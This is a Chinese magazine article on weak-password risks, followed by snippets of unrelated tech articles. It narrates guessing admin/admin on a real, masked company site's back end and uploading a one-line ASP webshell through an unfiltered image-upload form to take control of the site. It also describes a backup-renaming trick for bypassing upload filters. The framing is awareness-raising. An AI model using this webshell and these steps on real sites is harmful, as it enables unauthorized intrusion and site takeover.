网站安全的大敌

来源 :电脑爱好者 | 被引量 : 0次 | 上传用户:cqc465330937
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  如果一个网站存在弱口令漏洞,能让人轻易的拿到网站的webshell,就会对网站的安全以及浏览这个网站的电脑的安全造成严重的威胁,这决不是危言耸听,你不信的话来看下面的一个例子。
  
  昨晚在用百度搜索东西的时候看到了网页右边的推广网站,看来是网站购买了百度的推广服务,没什么事,就顺手点开一个网站看看网站的安全性如何。网站的地址为http://www.xxxfood.com/,为了不泄露具体的网址,我用xxx代替了网站域名的前3个字符,网站打开后如图1,界面还算清爽,来看下网站的安全性如何。
  顺手在网址后面加上admin/,也就是尝试访问http://www.xxxfood.com/admin/,出来如图2的后台登录页面。可能有的朋友会问你在网址后面加的是admin为什么不是123456?因为admin是很多网站管理系统后台目录的名字,尤其是ASP程序的。有了后台登录页面再知道管理员的用户名和密码就可以登录后台了,但我现在不知道管理员的用户名和密码,怎么办呢?来尝试下弱口令。
  弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。网站管理员最常用的用户名为admin,常用的弱口令密码为admin,admin888,123456等。来尝试下弱口令,首先尝试用户名admin,密码admin,第一次尝试居然就进去了后台,看来今天的运气不错。因为很多小的企业网站存在弱口令漏洞,我们可以用admin,admin的用户名密码组合尝试,不成功还可以再尝试下admin,admin888和admin,123456等用户名和密码组合。 进入后台后的界面如图3。
  进了后台就考虑利用后台的功能得到webshell。 最希望见到的就是可以直接上传webshell,如果过滤了上传文件的后缀的话可以先上传.jpg格式的webshell然后通过数据库备份功能把.jpg格式的webshell备份成.asp格式的(仅限于采用Access数据库的程序,而且后台要有数据库备份功能)。点击后台“新闻管理”下的“新闻添加”,再点“插入图片”按钮,出来了上传文件的地方,如图4。
  把ASP一句话木马服务端代码<%eval request("x")%>保存为文件123.asp,通过“浏览”按钮选择123.asp,点“上传”按钮后提示“您的文件123.asp已成功上传!”,如图5。
  好像上传成功了,说明程序没有对上传文件的后缀进行过滤。123.asp传到了哪里呢,点“HTML”按钮后就找到了上传文件的地址http://www.xxxfood.com/uploadpic/123.asp,如图6,说明上传到了网站根目录下的uploadpic文件夹下。
  用lake2的eval最小马发送端连接http://www.xxxfood.com/uploadpic/123.asp,写上密码x,成功获得webshell,如图7。利用这个webshell可以完全控制网站下的任何文件,在网页里挂马更是轻而易举,如果利用这个webshell进行提权,甚至能拿到网站所在服务器的系统权限。而一旦拿到了网站所在服务器的系统权限,同服务器上的其它网站将没有任何安全可言。好在我只是想看下网站的安全性,拿到webshell后没有修改网站的首页,更没有在网站文件里挂马,没有对网站原有的文件进行任何更改。但我不敢保证下一个利用弱口令漏洞进来的人不会做坏事,因此弱口令的危害是巨大的。
  弱口令漏洞是个很低级的漏洞,你用弱口令拿下一个网站都不好意思和别人说,但它的危害却是巨大的。一个网站的程序再安全,如果存在弱口令漏洞,在攻击者面前也可能瞬间被攻破。为什么会存在弱口令?很多时候是为了方便,好记。其实防范弱口令漏洞很简单,使用复杂一点的密码就可以了,比如密码的长度不要小于8位,密码最好由字母数字和特殊符号组成等。写本文的目的不是教大家怎样利用弱口令漏洞入侵网站,而是通过一个实例展示弱口令漏洞的危害,提醒有网站的朋友要注意弱口令漏洞,再远一点,你的邮箱、QQ等也要防范弱口令漏洞。
  注:本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文
其他文献
无法彻底清除X router  Q之前在系统中安装了软路由软件─X router,之后想将其卸载掉,但总是无法删除其驱动,重新启动后又会执行自动安装。请问这该如何解决?    A直接使用RegWorkshop这类注册表工具,搜索“XRouter”项,找到后将所有相关项全部删除即可解决问题,当然,也可以手工在注册表编辑器中搜索“XRouter”项进行清除。(注意:安全起见,在编辑修改注册表之前,最好
期刊
临下班时突然接到在外出差的同事小赵的电话,要我马上帮他上传一张正式照片给某会议。可我找了半天也没找到一张证件照,只有一张家庭合影照片,头部形态还不符合要求。时间紧急,我用半小时把这张侧脸的生活照“妙手回春”为一张证件照,及时上传了会议资料。一起来看看我是如何做的吧~~    1.点击PS工具拦中的“裁剪工具”将人物头像裁切下来,如图1所示。注意属性栏上面的“宽度”、“高度”、“分辨率”都要留空,不
期刊
近日,在地球另一端的欧洲出现了一位“摔跤少女”—照片上的她整个人从椅子上跌落,摔得连裙子都飘了起来,栩栩如生。而她以假乱真的摔跤技巧也在网络上引起了“围观”。 下面我们就来一起揭秘“跌落”照吧!    怎么样?有意思吧?是不是感觉很神奇?上次和大家一起探讨了“悬浮”照片的拍摄技巧,得到了很多读者的热烈反应。这次我们再接再厉,一起研究比“悬浮”更有趣更有技术含量的跌跤、飞行照!  1.首先,准备一台
期刊
【编者】PPT演讲的成功,不单单是取决于PPT使用和制作技术方面的技巧,还有制作思路方面的学问、演讲方法与技巧等诸多方面。本专题讲述的就是PPT专家们在PPT制作和成功演讲过程中的经验、体会和技巧。    不是说给谁看的幻灯片都可以是一个样。你制作幻灯片的目的是为了和你的演讲对象进行沟通,因此,你必须在制作之前把以下问题搞清楚。    1. 目标人群要弄清  不考虑演示对象,埋头去做自己的幻灯片,
期刊
笔记本电脑声卡不能发声  Q一台笔记本电脑,一直使用正常,最近一次操作中调整了一下Windows 7桌面右下角工具栏“小喇叭”图表,外置音箱就不能发声了,但是插入耳机可以正常听见声音,请问这是什么问题造成的?    A该问题可能是由于你的笔记本自带的功能热键将声音屏蔽造成的,建议你检查笔记本热键,看声音屏蔽键是否处于关闭状态;如果问题仍然没有解决,建议你先拔掉耳机,然后进入音量控制面板,检查一下扬
期刊
(来源:人民网)  9月初,大学新生们迎来了崭新的大学生活。在求职日显艰难的今天,大学生们从跨入大学的第一天起,就开始计划着4年后的出路。    天津理工大学机电专业的学生干部张森说  参加社团活动或进入学生会,能够从很多方面锻炼一个人的综合能力。有些学生在学生会表现出色,比普通学生有更多机会被推荐到名企去工作。有些同学兼职干得很出色,毕业后就直接留在了那家公司,有的同学干的活很累,也挣不了多少钱
期刊
最近,做文案工作的我,接到这样一个任务,打印5000份内容相同的文件。任务要求:在文件编码位置打印从No:00001至No:05000,每份文件打印2份;任务时间6小时。  接到任务感觉这活特别繁琐,一页一页添加连续编码要做一天也不一定做完,考虑到时间紧任务重,我就想走捷径。印象中Word里的宏功能强大,立马上网查询相关内容,结果是没用的多,实用的少。于是,去粗取精、去伪存真,把查到有用的代码经过
期刊
“防火墙”让你安心联网  小陈新买了一部摩托罗拉ME525手机,不过手机号依旧是以前动感地带的2G号,每月只有30MB的免费流量。一个月后的账单却让小陈傻了眼:竟然走了50多兆的流量!自己上网时很小心啊,关闭了系统自动更新等费流量的功能,不联网时也关闭了网络开关,为什么流量还是这么费呢?  Android系统中很多软件和后台服务都会以Service的形式偷偷联网,即便你在设置中关闭了所有网络选项。
期刊
都说电子管的家庭Hifi设备非常发烧,让很多朋友可望而不可及。但是不用担心,借助软件我们一样能够真实地体会到昂贵的电子管前级所回放声音的品质,也就是俗称的“胆味”。    不知道朋友们有没听过电子管(南方人则称呼为胆)这个名词,这是一种古老的电子元件。在一些特别领域比如音响行业电子管大放光芒,尤其是这几年大有回潮盖过晶体管之势。这是因为电子管的声音润泽柔和,用电子管扩音机播放的人声十分自然讨人喜欢
期刊
很多人都将Llano APU视为AMD挑战英特尔SNB移动处理器的杀手锏,那么这颗“真融合”的处理器能否为AMD在笔记本领域开疆拓土呢?在与SNB的性能较量中谁更出色呢?  华硕K43T是第一批搭载AMD Llano APU处理器的笔记本,这款产品搭载了四核心的A6-3400M处理器,由集成的HD 6520G与独立的HD 6650M组建强大的“交火”系统,借助IceCool技术可以让掌托始终保持在
期刊